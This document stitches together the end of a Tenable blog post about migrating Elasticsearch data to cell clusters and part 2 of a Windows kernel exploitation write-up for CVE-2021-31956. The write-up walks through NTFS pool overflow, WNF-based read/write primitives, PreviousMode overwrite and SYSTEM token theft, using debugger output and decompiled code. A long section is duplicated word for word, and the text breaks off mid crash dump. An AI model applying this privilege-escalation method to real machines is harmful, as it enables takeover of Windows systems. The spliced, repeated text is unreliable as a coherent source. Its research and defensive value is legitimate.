Since we started this effort, we have noticed drastic performance improvement. Elasticsearch scroll speed saw up to 15X performance improvement, and queries decreased in latency of up to several orders of magnitude.

The chart below is a large scroll request that goes through millions of vulnerabilities. Prior to the cell migration, it could take over 24 hours to run the full scroll. The scroll from the monolith cluster suffers slow performance from the frequent resource contention with other customers, and it is further slowed by our fairness algorithm’s throttling. After the customer is migrated to the cell cluster, the same scroll request completes in just over 1.5 hours. Not only is this a large improvement for this customer, but other customers also reap the benefits of the decrease in contention.

In Summary

Our change in scaling strategy has resulted in large performance improvements for the Tenable.io platform. The new request routing layer and backfill process gave us new powerful tools to shard customer data. The resharding process is streamlined to an easy, safe and zero downtime operation.

Overall, the team is thrilled with the end result. It took a lot of ingenuity, dedication, and teamwork to execute a zero downtime migration of this scale.

tl;dr:

  • Exponential customer growth on the Tenable.io platform led to a huge increase in the data stored in a monolithic Elasticsearch cluster to the point where it was becoming a challenge to scale further with the existing architecture.
  • We broke down the site monolith cluster to cell clusters to improve performance.
  • We migrated customer data through a custom proxy and Spark job, all with zero downtime.
  • Scrolls performance improved by 15x, and queries latency reduced by several orders of magnitude.

Brought to you by the Sharders team:
Alan Ning, Alex Barbour, Ciaran Gaffney, Jagan Kondapalli, Johnny Mao, Shannon Prickett, Ted O’Meara, Tristan Burch

Special thanks to Jack Matheson and Vincent Gilcreest for all the help with editing.


Scaling Tenable.io — From Site to Cell was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 2

17 August 2021 at 08:05

Introduction

In part 1 the aim was to cover the following:

  • An overview of the vulnerability assigned CVE-2021-31956 (NTFS Paged Pool Memory corruption) and how to trigger

  • An introduction into the Windows Notification Framework (WNF) from an exploitation perspective

  • Exploit primitives which can be built using WNF

In this article I aim to build on that previous knowledge and cover the following areas:

  • Exploitation without the CVE-2021-31955 information disclosure

  • Enabling better exploit primitives through PreviousMode

  • Reliability, stability and exploit clean-up

  • Thoughts on detection

The version targeted within this blog was Windows 10 20H2 (OS Build 19042.508). However, this approach has been tested on all Windows versions post 19H1 when the segment pool was introduced.

Exploitation without CVE-2021-31955 information disclosure

I hinted in the previous blog post that this vulnerability could likely be exploited without the usage of the separate EPROCESS address leak vulnerability CVE-2021-31955). This was also realised too by Yan ZiShuang and documented within the blog post.

Typically, for Windows local privilege escalation, once an attacker has achieved arbitrary write or kernel code execution then the aim will be to escalate privileges for their associated userland process or pan a privileged command shell. Windows processes have an associated kernel structure called _EPROCESS which acts as the process object for that process. Within this structure, there is a Token member which represents the process’s security context and contains things such as the token privileges, token types, session id etc.

CVE-2021-31955 lead to an information disclosure of the address of the _EPROCESS for each running process on the system and was understood to be used by the in-the-wild attacks found by Kaspersky. However, in practice for exploitation of CVE-2021-31956 this separate vulnerability is not needed.

This is due to the _EPROCESS pointer being contained within the _WNF_NAME_INSTANCE as the CreatorProcess member:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Therefore, provided that it is possible to get a relative read/write primitive using a _WNF_STATE_DATA to be able to read and{write to a subsequent _WNF_NAME_INSTANCE, we can then overwrite the StateData pointer to point at an arbitrary location and also read the CreatorProcess address to obtain the address of the _EPROCESS structure within memory.

The initial pool layout we are aiming is as follows:

The difficulty with this is that due to the low fragmentation heap (LFH) randomisation, it makes reliably achieving this memory layout more difficult and iteration one of this exploit stayed away from the approach until more research was performed into improving the general reliability and reducing the chances of a BSOD.

As an example, under normal scenarios you might end up with the following allocation pattern for a number of sequentially allocated blocks:

In the absense of an LFH "Heap Randomisation" weakness or vulnerability, then this post explains how it is possible to achieve a "reasonably" high level of exploitation success and what necessary cleanups need to occur in order to maintain system stability post exploitation.

Stage 1: The Spray and Overflow

Starting from where we left off in the first article, we need to go back and rework the spray and overflow.

Firstly, our _WNF_NAME_INSTANCE is 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. As mentioned previously this gets put into a chunk of size 0xC0.

We also need to spray _WNF_STATE_DATA objects of size 0xA0 (which when added with the header 0x10 + the POOL_HEADER (0x10) we also end up with a chunk allocated of 0xC0.

As mentioned within part 1 of the article, since we can control the size of the vulnerable allocation we can also ensure that our overflowing NTFS extended attribute chunk is also allocated within the 0xC0 segment.

However, we cannot deterministically know which object will be adjacent to our vulnerable NTFS chunk (as mentioned above), we cannot take a similar approach of free’ing holes as in the past article and then reusing the resulting holes, as both the _WNF_STATE_DATA and _WNF_NAME_INSTANCE objects are allocated at the same time, and we need both present within the same pool segment.

Therefore, we need to be very careful with the overflow. We make sure that only the following fields are overflowed by 0x10 bytes (and the POOL_HEADER).

In the case of a corrupted _WNF_NAME_INSTANCE, both the Header and RunRef members will be overflowed:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF

In the case of a corrupted _WNF_STATE_DATA, the Header, AllocatedSize, DataSize and ChangeTimestamp members will be overflowed:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

As we don’t know if we are going to overflow a _WNF_NAME_INSTANCE or a _WNF_STATE_DATA first, then we can trigger the overflow and check for corruption by loop through querying each _WNF_STATE_DATA using NtQueryWnfStateData.

If we detect corruption, then we know we have identified our _WNF_STATE_DATA object. If not, then we can repeatedly trigger the spray and overflow until we have obtained a _WNF_STATE_DATA object which allows a read/write across the pool subsegment.

There are a few problems with this approach, some which can be addressed and some which there is not a perfect solution for:

  1. We only want to corrupt _WNF_STATE_DATA objects but the pool segment also contains _WNF_NAME_INSTANCE objects due to needing to be the same size. Using only a 0x10 data size overflow and cleaning up afterwards (as described in the Kernel Memory Cleanup section) means that this issue does not cause a problem.

  2. Occasionally our unbounded _WNF_STATA_DATA containing chunk can be allocated within the final block within the pool segment. This means that when querying with NtQueryWnfStateData an unmapped memory read will occur off the end of the page. This rarely happens in practice and increasing the spray size reduces the likelihood of this occurring (see Exploit Testing and Statistics section).

  3. Other operating system functionality may make an allocation within the 0xC0 pool segment and lead to corruption and instability. By performing a large spray size before triggering the overflow, from practical testing, this seems to rarely happen within the test environment.

I think it’s useful to document these challenges with modern memory corruption exploitation techniques where it’s not always possible to gain 100% reliability.

Overall with 1) remediated and 2+3 only occurring very rarely, in lieu of a perfect solution we can move to the next stage.

Stage 2: Locating a _WNF_NAME_INSTANCE and overwriting the StateData pointer

Once we have unbounded our _WNF_STATE_DATA by overflowing the DataSize and AllocatedSize as described above, and within the first blog post, then we can then use the relative read to locate an adjacent _WNF_NAME_INSTANCE.

By scanning through the memory we can locate the pattern "\x03\x09\xa8" which denotes the start of a _WNF_NAME_INSTANCE and from this obtain the interesting member variables.

The CreatorProcess, StateName, StateData, ScopeInstance can be disclosed from the identified target object.

We can then use the relative write to replace the StateData pointer with an arbitrary location which is desired for our read and write primitive. For example, an offset within the _EPROCESS structure based on the address which has been obtained from CreatorProcess.

Care needs to be taken here to ensure that the new location StateData points at overlaps with sane values for the AllocatedSize, DataSize values preceding the data wishing to be read or written.

In this case the aim was to achieve a full arbitrary read and write but without having the constraints of needing to find sane and reliable AllocatedSize and DataSize values prior to the memory which it was desired to write too.

Our overall goal was to target the KTHREAD structure’s PreviousMode member and then make use of make use of the APIs NtReadVirtualMemory and NtWriteVirtualMemory to enable a more flexible arbitrary read and write.

It helps to have a good understanding of how these kernel memory structure are used to understand how this works. In a massively simplified overview, the kernel mode portion of Windows contains a number of subsystems. The hardware abstraction layer (HAL), the executive subsystems and the kernel. _EPROCESS is part of the executive layer which deals with general OS policy and operations. The kernel subsystem handles architecture specific details for low level operations and the HAL provides a abstraction layer to deal with differences between hardware.

Processes and threads are represeted at both the executive and kernel "layer" within kernel memory as _EPROCESS and _KPROCESS and _ETHREAD and _KTHREAD structures respectively.

The documentation on PreviousMode states "When a user-mode application calls the Nt or Zw version of a native system services routine, the system call mechanism traps the calling thread to kernel mode. To indicate that the parameter values originated in user mode, the trap handler for the system call sets the PreviousMode field in the thread object of the caller to UserMode. The native system services routine checks the PreviousMode field of the calling thread to determine whether the parameters are from a user-mode source."

Looking at MiReadWriteVirtualMemory which is called from NtWriteVirtualMemory we can see that if PreviousMode is not set when a user-mode thread executes, then the address validation is skipped and kernel memory space addresses can be written too:

__int64 __fastcall MiReadWriteVirtualMemory(
        HANDLE Handle,
        size_t BaseAddress,
        size_t Buffer,
        size_t NumberOfBytesToWrite,
        __int64 NumberOfBytesWritten,
        ACCESS_MASK DesiredAccess)
{
  int v7; // er13
  __int64 v9; // rsi
  struct _KTHREAD *CurrentThread; // r14
  KPROCESSOR_MODE PreviousMode; // al
  _QWORD *v12; // rbx
  __int64 v13; // rcx
  NTSTATUS v14; // edi
  _KPROCESS *Process; // r10
  PVOID v16; // r14
  int v17; // er9
  int v18; // er8
  int v19; // edx
  int v20; // ecx
  NTSTATUS v21; // eax
  int v22; // er10
  char v24; // [rsp+40h] [rbp-48h]
  __int64 v25; // [rsp+48h] [rbp-40h] BYREF
  PVOID Object[2]; // [rsp+50h] [rbp-38h] BYREF
  int v27; // [rsp+A0h] [rbp+18h]

  v27 = Buffer;
  v7 = BaseAddress;
  v9 = 0i64;
  Object[0] = 0i64;
  CurrentThread = KeGetCurrentThread();
  PreviousMode = CurrentThread->PreviousMode;
  v24 = PreviousMode;
  if ( PreviousMode )
  {
    if ( NumberOfBytesToWrite + BaseAddress < BaseAddress
      || NumberOfBytesToWrite + BaseAddress > 0x7FFFFFFF0000i64
      || Buffer + NumberOfBytesToWrite < Buffer
      || Buffer + NumberOfBytesToWrite > 0x7FFFFFFF0000i64 )
    {
      return 3221225477i64;
    }
    v12 = (_QWORD *)NumberOfBytesWritten;
    if ( NumberOfBytesWritten )
    {
      v13 = NumberOfBytesWritten;
      if ( (unsigned __int64)NumberOfBytesWritten >= 0x7FFFFFFF0000i64 )
        v13 = 0x7FFFFFFF0000i64;
      *(_QWORD *)v13 = *(_QWORD *)v13;
    }
  }

This technique was also covered previously within the NCC Group blog post on Exploiting Windows KTM too.

So how would we go about locating PreviousMode based on the address of _EPROCESS obtained from our relative read of CreatorProcess? At the start of the _EPROCESS structure, _KPROCESS is included as Pcb.

dt _EPROCESS
ntdll!_EPROCESS
   +0x000 Pcb              : _KPROCESS

Within _KPROCESS we have the following:

 dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_KPROCESS *)0xffffd186087b1300))
(*((ntdll!_KPROCESS *)0xffffd186087b1300))                 [Type: _KPROCESS]
    [+0x000] Header           [Type: _DISPATCHER_HEADER]
    [+0x018] ProfileListHead  [Type: _LIST_ENTRY]
    [+0x028] DirectoryTableBase : 0xa3b11000 [Type: unsigned __int64]
    [+0x030] ThreadListHead   [Type: _LIST_ENTRY]
    [+0x040] ProcessLock      : 0x0 [Type: unsigned long]
    [+0x044] ProcessTimerDelay : 0x0 [Type: unsigned long]
    [+0x048] DeepFreezeStartTime : 0x0 [Type: unsigned __int64]
    [+0x050] Affinity         [Type: _KAFFINITY_EX]
    [+0x0f8] AffinityPadding  [Type: unsigned __int64 [12]]
    [+0x158] ReadyListHead    [Type: _LIST_ENTRY]
    [+0x168] SwapListEntry    [Type: _SINGLE_LIST_ENTRY]
    [+0x170] ActiveProcessors [Type: _KAFFINITY_EX]
    [+0x218] ActiveProcessorsPadding [Type: unsigned __int64 [12]]
    [+0x278 ( 0: 0)] AutoAlignment    : 0x0 [Type: unsigned long]
    [+0x278 ( 1: 1)] DisableBoost     : 0x0 [Type: unsigned long]
    [+0x278 ( 2: 2)] DisableQuantum   : 0x0 [Type: unsigned long]
    [+0x278 ( 3: 3)] DeepFreeze       : 0x0 [Type: unsigned long]
    [+0x278 ( 4: 4)] TimerVirtualization : 0x0 [Type: unsigned long]
    [+0x278 ( 5: 5)] CheckStackExtents : 0x0 [Type: unsigned long]
    [+0x278 ( 6: 6)] CacheIsolationEnabled : 0x0 [Type: unsigned long]
    [+0x278 ( 9: 7)] PpmPolicy        : 0x7 [Type: unsigned long]
    [+0x278 (10:10)] VaSpaceDeleted   : 0x0 [Type: unsigned long]
    [+0x278 (31:11)] ReservedFlags    : 0x0 [Type: unsigned long]
    [+0x278] ProcessFlags     : 896 [Type: long]
    [+0x27c] ActiveGroupsMask : 0x1 [Type: unsigned long]
    [+0x280] BasePriority     : 8 [Type: char]
    [+0x281] QuantumReset     : 6 [Type: char]
    [+0x282] Visited          : 0 [Type: char]
    [+0x283] Flags            [Type: _KEXECUTE_OPTIONS]
    [+0x284] ThreadSeed       [Type: unsigned short [20]]
    [+0x2ac] ThreadSeedPadding [Type: unsigned short [12]]
    [+0x2c4] IdealProcessor   [Type: unsigned short [20]]
    [+0x2ec] IdealProcessorPadding [Type: unsigned short [12]]
    [+0x304] IdealNode        [Type: unsigned short [20]]
    [+0x32c] IdealNodePadding [Type: unsigned short [12]]
    [+0x344] IdealGlobalNode  : 0x0 [Type: unsigned short]
    [+0x346] Spare1           : 0x0 [Type: unsigned short]
    [+0x348] StackCount       [Type: _KSTACK_COUNT]
    [+0x350] ProcessListEntry [Type: _LIST_ENTRY]
    [+0x360] CycleTime        : 0x0 [Type: unsigned __int64]
    [+0x368] ContextSwitches  : 0x0 [Type: unsigned __int64]
    [+0x370] SchedulingGroup  : 0x0 [Type: _KSCHEDULING_GROUP *]
    [+0x378] FreezeCount      : 0x0 [Type: unsigned long]
    [+0x37c] KernelTime       : 0x0 [Type: unsigned long]
    [+0x380] UserTime         : 0x0 [Type: unsigned long]
    [+0x384] ReadyTime        : 0x0 [Type: unsigned long]
    [+0x388] UserDirectoryTableBase : 0x0 [Type: unsigned __int64]
    [+0x390] AddressPolicy    : 0x0 [Type: unsigned char]
    [+0x391] Spare2           [Type: unsigned char [71]]
    [+0x3d8] InstrumentationCallback : 0x0 [Type: void *]
    [+0x3e0] SecureState      [Type: ]
    [+0x3e8] KernelWaitTime   : 0x0 [Type: unsigned __int64]
    [+0x3f0] UserWaitTime     : 0x0 [Type: unsigned __int64]
    [+0x3f8] EndPadding       [Type: unsigned __int64 [8]]

There is a member ThreadListHead which is a doubly linked list of _KTHREAD.

If the exploit only has one thread, then the Flink will be a pointer to an offset from the start of the _KTHREAD:

dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))
(*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))                 [Type: _LIST_ENTRY]
    [+0x000] Flink            : 0xffffd18606a54378 [Type: _LIST_ENTRY *]
    [+0x008] Blink            : 0xffffd18608840378 [Type: _LIST_ENTRY *]

From this we can calculate the base address of the _KTHREAD using the offset of 0x2F8 i.e. the ThreadListEntry offset.

0xffffd18606a54378 - 0x2F8 = 0xffffd18606a54080

We can check this correct (and see we hit our breakpoint in the previous article):

This technique was also covered previously within the NCC Group blog post on Exploiting Windows KTM too.

So how would we go about locating PreviousMode based on the address of _EPROCESS obtained from our relative read of CreatorProcess? At the start of the _EPROCESS structure, _KPROCESS is included as Pcb.

dt _EPROCESS
ntdll!_EPROCESS
   +0x000 Pcb              : _KPROCESS

Within _KPROCESS we have the following:

dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_KPROCESS *)0xffffd186087b1300))
(*((ntdll!_KPROCESS *)0xffffd186087b1300))                 [Type: _KPROCESS]
    [+0x000] Header           [Type: _DISPATCHER_HEADER]
    [+0x018] ProfileListHead  [Type: _LIST_ENTRY]
    [+0x028] DirectoryTableBase : 0xa3b11000 [Type: unsigned __int64]
    [+0x030] ThreadListHead   [Type: _LIST_ENTRY]
    [+0x040] ProcessLock      : 0x0 [Type: unsigned long]
    [+0x044] ProcessTimerDelay : 0x0 [Type: unsigned long]
    [+0x048] DeepFreezeStartTime : 0x0 [Type: unsigned __int64]
    [+0x050] Affinity         [Type: _KAFFINITY_EX]
    [+0x0f8] AffinityPadding  [Type: unsigned __int64 [12]]
    [+0x158] ReadyListHead    [Type: _LIST_ENTRY]
    [+0x168] SwapListEntry    [Type: _SINGLE_LIST_ENTRY]
    [+0x170] ActiveProcessors [Type: _KAFFINITY_EX]
    [+0x218] ActiveProcessorsPadding [Type: unsigned __int64 [12]]
    [+0x278 ( 0: 0)] AutoAlignment    : 0x0 [Type: unsigned long]
    [+0x278 ( 1: 1)] DisableBoost     : 0x0 [Type: unsigned long]
    [+0x278 ( 2: 2)] DisableQuantum   : 0x0 [Type: unsigned long]
    [+0x278 ( 3: 3)] DeepFreeze       : 0x0 [Type: unsigned long]
    [+0x278 ( 4: 4)] TimerVirtualization : 0x0 [Type: unsigned long]
    [+0x278 ( 5: 5)] CheckStackExtents : 0x0 [Type: unsigned long]
    [+0x278 ( 6: 6)] CacheIsolationEnabled : 0x0 [Type: unsigned long]
    [+0x278 ( 9: 7)] PpmPolicy        : 0x7 [Type: unsigned long]
    [+0x278 (10:10)] VaSpaceDeleted   : 0x0 [Type: unsigned long]
    [+0x278 (31:11)] ReservedFlags    : 0x0 [Type: unsigned long]
    [+0x278] ProcessFlags     : 896 [Type: long]
    [+0x27c] ActiveGroupsMask : 0x1 [Type: unsigned long]
    [+0x280] BasePriority     : 8 [Type: char]
    [+0x281] QuantumReset     : 6 [Type: char]
    [+0x282] Visited          : 0 [Type: char]
    [+0x283] Flags            [Type: _KEXECUTE_OPTIONS]
    [+0x284] ThreadSeed       [Type: unsigned short [20]]
    [+0x2ac] ThreadSeedPadding [Type: unsigned short [12]]
    [+0x2c4] IdealProcessor   [Type: unsigned short [20]]
    [+0x2ec] IdealProcessorPadding [Type: unsigned short [12]]
    [+0x304] IdealNode        [Type: unsigned short [20]]
    [+0x32c] IdealNodePadding [Type: unsigned short [12]]
    [+0x344] IdealGlobalNode  : 0x0 [Type: unsigned short]
    [+0x346] Spare1           : 0x0 [Type: unsigned short]
    [+0x348] StackCount       [Type: _KSTACK_COUNT]
    [+0x350] ProcessListEntry [Type: _LIST_ENTRY]
    [+0x360] CycleTime        : 0x0 [Type: unsigned __int64]
    [+0x368] ContextSwitches  : 0x0 [Type: unsigned __int64]
    [+0x370] SchedulingGroup  : 0x0 [Type: _KSCHEDULING_GROUP *]
    [+0x378] FreezeCount      : 0x0 [Type: unsigned long]
    [+0x37c] KernelTime       : 0x0 [Type: unsigned long]
    [+0x380] UserTime         : 0x0 [Type: unsigned long]
    [+0x384] ReadyTime        : 0x0 [Type: unsigned long]
    [+0x388] UserDirectoryTableBase : 0x0 [Type: unsigned __int64]
    [+0x390] AddressPolicy    : 0x0 [Type: unsigned char]
    [+0x391] Spare2           [Type: unsigned char [71]]
    [+0x3d8] InstrumentationCallback : 0x0 [Type: void *]
    [+0x3e0] SecureState      [Type: ]
    [+0x3e8] KernelWaitTime   : 0x0 [Type: unsigned __int64]
    [+0x3f0] UserWaitTime     : 0x0 [Type: unsigned __int64]
    [+0x3f8] EndPadding       [Type: unsigned __int64 [8]]

There is a member ThreadListHead which is a doubly linked list of _KTHREAD.

If the exploit only has one thread, then the Flink will be a pointer to an offset from the start of the _KTHREAD:

dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))
(*((ntdll!_LIST_ENTRY *)0xffffd186087b1330))                 [Type: _LIST_ENTRY]
    [+0x000] Flink            : 0xffffd18606a54378 [Type: _LIST_ENTRY *]
    [+0x008] Blink            : 0xffffd18608840378 [Type: _LIST_ENTRY *]

From this we can calculate the base address of the _KTHREAD using the offset of 0x2F8 i.e. the ThreadListEntry offset.

0xffffd18606a54378 - 0x2F8 = 0xffffd18606a54080

We can check this correct (and see we hit our breakpoint in the previous article):

0: kd> !thread 0xffffd18606a54080
THREAD ffffd18606a54080  Cid 1da0.1da4  Teb: 000000ce177e0000 Win32Thread: 0000000000000000 RUNNING on processor 0
IRP List:
    ffffd18608002050: (0006,0430) Flags: 00060004  Mdl: 00000000
Not impersonating
DeviceMap                 ffffba0cc30c6630
Owning Process            ffffd186087b1300       Image:         amberzebra.exe
Attached Process          N/A            Image:         N/A
Wait Start TickCount      2344           Ticks: 1 (0:00:00:00.015)
Context Switch Count      149            IdealProcessor: 1             
UserTime                  00:00:00.000
KernelTime                00:00:00.015
Win32 Start Address 0x00007ff6da2c305c
Stack Init ffffd0096cdc6c90 Current ffffd0096cdc6530
Base ffffd0096cdc7000 Limit ffffd0096cdc1000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP          RetAddr           : Args to Child                                                           : Call Site
ffffd009`6cdc62a8 fffff805`5a99bc7a : 00000000`00000000 00000000`000000d0 00000000`00000000 ffffba0c`00000000 : Ntfs!NtfsQueryEaUserEaList
ffffd009`6cdc62b0 fffff805`5a9fc8a6 : ffffd009`6cdc6560 ffffd186`08002050 ffffd186`08002300 ffffd186`06a54000 : Ntfs!NtfsCommonQueryEa+0x22a
ffffd009`6cdc6410 fffff805`5a9fc600 : ffffd009`6cdc6560 ffffd186`08002050 ffffd186`08002050 ffffd009`6cdc7000 : Ntfs!NtfsFsdDispatchSwitch+0x286
ffffd009`6cdc6540 fffff805`570d1f35 : ffffd009`6cdc68b0 fffff805`54704b46 ffffd009`6cdc7000 ffffd009`6cdc1000 : Ntfs!NtfsFsdDispatchWait+0x40
ffffd009`6cdc67e0 fffff805`54706ccf : ffffd186`02802940 ffffd186`00000030 00000000`00000000 00000000`00000000 : nt!IofCallDriver+0x55
ffffd009`6cdc6820 fffff805`547048d3 : ffffd009`6cdc68b0 00000000`00000000 00000000`00000001 ffffd186`03074bc0 : FLTMGR!FltpLegacyProcessingAfterPreCallbacksCompleted+0x28f
ffffd009`6cdc6890 fffff805`570d1f35 : ffffd186`08002050 00000000`000000c0 00000000`000000c8 00000000`000000a4 : FLTMGR!FltpDispatch+0xa3
ffffd009`6cdc68f0 fffff805`574a6fb8 : ffffd186`08002050 00000000`00000000 00000000`00000000 fffff805`577b2094 : nt!IofCallDriver+0x55
ffffd009`6cdc6930 fffff805`57455834 : 000000ce`00000000 ffffd009`6cdc6b80 ffffd186`084eb7b0 ffffd009`6cdc6b80 : nt!IopSynchronousServiceTail+0x1a8
ffffd009`6cdc69d0 fffff805`572058b5 : ffffd186`06a54080 000000ce`178fdae8 000000ce`178feba0 00000000`000000a3 : nt!NtQueryEaFile+0x484
ffffd009`6cdc6a90 00007fff`0bfae654 : 00007ff6`da2c14dd 00007ff6`da2c4490 00000000`000000a3 000000ce`178fbee8 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffd009`6cdc6b00)
000000ce`178fdac8 00007ff6`da2c14dd : 00007ff6`da2c4490 00000000`000000a3 000000ce`178fbee8 0000026e`edf509ba : ntdll!NtQueryEaFile+0x14
000000ce`178fdad0 00007ff6`da2c4490 : 00000000`000000a3 000000ce`178fbee8 0000026e`edf509ba 00000000`00000000 : 0x00007ff6`da2c14dd
000000ce`178fdad8 00000000`000000a3 : 000000ce`178fbee8 0000026e`edf509ba 00000000`00000000 000000ce`178fdba0 : 0x00007ff6`da2c4490
000000ce`178fdae0 000000ce`178fbee8 : 0000026e`edf509ba 00000000`00000000 000000ce`178fdba0 000000ce`00000017 : 0xa3
000000ce`178fdae8 0000026e`edf509ba : 00000000`00000000 000000ce`178fdba0 000000ce`00000017 00000000`00000000 : 0x000000ce`178fbee8
000000ce`178fdaf0 00000000`00000000 : 000000ce`178fdba0 000000ce`00000017 00000000`00000000 0000026e`00000001 : 0x0000026e`edf509ba

So we now know how to calculate the address of the `_KTHREAD` kernel data structure which is associated with our running exploit thread. 


At the end of stage 2 we have the following memory layout:

Stage 3 – Abusing PreviousMode

Once we have set the StateData pointer of the _WNF_NAME_INSTANCE prior to the _KPROCESS ThreadListHead Flink we can leak out the value by confusing it with the DataSize and the ChangeTimestamp, we can then calculate the FLINK as “FLINK = (uintptr_t)ChangeTimestamp << 32 | DataSize` after querying the object.

This allows us to calculate the _KTHREAD address using FLINK - 0x2f8.

Once we have the address of the _KTHREAD we need to again find a sane value to confuse with the AllocatedSize and DataSize to allow reading and writing of PreviousMode value at offset 0x232.

In this case, pointing it into here:

   +0x220 Process          : 0xffff900f`56ef0340 _KPROCESS
   +0x228 UserAffinity     : _GROUP_AFFINITY
   +0x228 UserAffinityFill : [10]  &quot;???&quot;

Gives the following "sane" values:

dt _WNF_STATE_DATA FLINK-0x2f8+0x220

nt!_WNF_STATE_DATA
+ 0x000 Header           : _WNF_NODE_HEADER
+ 0x004 AllocatedSize : 0xffff900f
+ 0x008 DataSize : 3
+ 0x00c ChangeStamp : 0

Allowing the most significant word of the Process pointer shown above to be used as the AllocatedSize and the UserAffinity to act as the DataSize. Incidentally, we can actually influence this value used for DataSize using SetProcessAffinityMask or launching the process with start /affinity exploit.exe but for our purposes of being able to read and write PreviousMode this is fine.

Visually this looks as follows after the StateData has been modified:

This gives a 3 byte read (and up to 0xffff900f bytes write if needed – but we only need 3 bytes), of which the PreviousMode is included (i.e set to 1 before modification):

00 00 01 00 00 00 00 00  00 00 | ..........

Using the most significant word of the pointer with it always being a kernel mode address, should ensure that this is a sufficient AllocatedSize to enable overwriting PreviousMode.

Post Exploitation

Once we have set PreviousMode to 0, as mentioned above, this now gives an unconstrained read/write across the whole kernel memory space using NtWriteVirtualMemory and NtReadVirtualMemory. This is a very powerful method and demonstrates how moving from an awkward to use arbitrary read/write to a better method which enables easier post exploitation and enhanced clean up options.

It is then trivial to walk the ActiveProcessLinks within the EPROCESS, obtain a pointer to a SYSTEM token and replace the existing token with this or to perform escalation by overwriting the _SEP_TOKEN_PRIVILEGES for the existing token using techniques which have been long used by Windows exploits.

Kernel Memory Cleanup

OK, so the above is good enough for a proof of concept exploit but due to the potentially large amount of memory writes needing to occur for exploit success, then it could leave the kernel in a bad state. Also, when the process terminates then certain memory locations which have been overwritten could trigger a BSOD when that corrupted memory is used.

This part of the exploitation process is often overlooked by proof of concept exploit writers but is often the most challenging for use in real world scenario’s (red teams / simulated attacks etc) where stability and reliability are important. Going through this process also helps understand how these types of attacks can also be detected.

This section of the blog describes some improvements which can be made in this area.

PreviousMode Restoration

On the version of Windows tested, if we try to launch a new process as SYSTEM but PreviousMode is still set to 0. Then we end up with the following crash:

```
Access violation - code c0000005 (!!! second chance !!!)
nt!PspLocateInPEManifest+0xa9:
fffff804`502f1bb5 0fba68080d      bts     dword ptr [rax+8],0Dh
0: kd> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 ffff8583`c6259c90 fffff804`502f0689 : 00000195`b24ec500 00000000`00000000 00000000`00000428 00007ff6`00000000 : nt!PspLocateInPEManifest+0xa9
01 ffff8583`c6259d00 fffff804`501f19d0 : 00000000`000022aa ffff8583`c625a350 00000000`00000000 00000000`00000000 : nt!PspSetupUserProcessAddressSpace+0xdd
02 ffff8583`c6259db0 fffff804`5021ca6d : 00000000`00000000 ffff8583`c625a350 00000000`00000000 00000000`00000000 : nt!PspAllocateProcess+0x11a4
03 ffff8583`c625a2d0 fffff804`500058b5 : 00000000`00000002 00000000`00000001 00000000`00000000 00000195`b24ec560 : nt!NtCreateUserProcess+0x6ed
04 ffff8583`c625aa90 00007ffd`b35cd6b4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffff8583`c625ab00)
05 0000008c`c853e418 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!NtCreateUserProcess+0x14
```

More research needs to be performed to determine if this is necessary on prior versions or if this was a recently introduced change.

This can be fixed simply by using our NtWriteVirtualMemory APIs to restore the PreviousMode value to 1 before launching the cmd.exe shell.

StateData Pointer Restoration

The _WNF_STATE_DATA StateData pointer is free’d when the _WNF_NAME_INSTANCE is freed on process termination (incidentially also an arbitrary free). If this is not restored to the original value, we will end up with a crash as follows:

00 ffffdc87`2a708cd8 fffff807`27912082 : ffffdc87`2a708e40 fffff807`2777b1d0 00000000`00000100 00000000`00000000 : nt!DbgBreakPointWithStatus
01 ffffdc87`2a708ce0 fffff807`27911666 : 00000000`00000003 ffffdc87`2a708e40 fffff807`27808e90 00000000`0000013a : nt!KiBugCheckDebugBreak+0x12
02 ffffdc87`2a708d40 fffff807`277f3fa7 : 00000000`00000003 00000000`00000023 00000000`00000012 00000000`00000000 : nt!KeBugCheck2+0x946
03 ffffdc87`2a709450 fffff807`2798d938 : 00000000`0000013a 00000000`00000012 ffffa409`6ba02100 ffffa409`7120a000 : nt!KeBugCheckEx+0x107
04 ffffdc87`2a709490 fffff807`2798d998 : 00000000`00000012 ffffdc87`2a7095a0 ffffa409`6ba02100 fffff807`276df83e : nt!RtlpHeapHandleError+0x40
